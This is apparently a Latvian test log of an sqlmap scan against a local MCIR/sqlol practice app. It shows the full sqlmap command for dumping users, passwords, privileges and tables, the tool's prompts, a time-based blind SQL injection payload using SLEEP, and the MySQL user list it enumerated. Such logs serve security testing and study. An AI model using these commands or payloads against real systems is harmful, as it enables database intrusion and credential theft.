=================================================================================
0. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --users -passwords --privileges --roles --dbs --tables --columns --risk=3 --level=5

1. Jautājumi, kurus uzdeva SQLMap
1.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
1.2. GET parameter 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
1.3. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
1.4. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

2.
Testpiemērs iesākts plkst 19:09:26, līdz 5. jautājumam nonācām plkst 19:14:57, līdz 19:20:00 netika konsolē izprintēts neviens ziņojums, tātad uzskatām, ka pārsniegts 5 min limits un vājības netika atrastas.
=================================================================================
sqlmap identified the following injection point(s) with a total of 5667 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test' AND (SELECT 9828 FROM (SELECT(SLEEP(5)))DnPL)-- kuvk&location=where_string&submit=Inject!
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12
database management system users [4]:
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'
[*] 'vernersmednis'@'localhost'

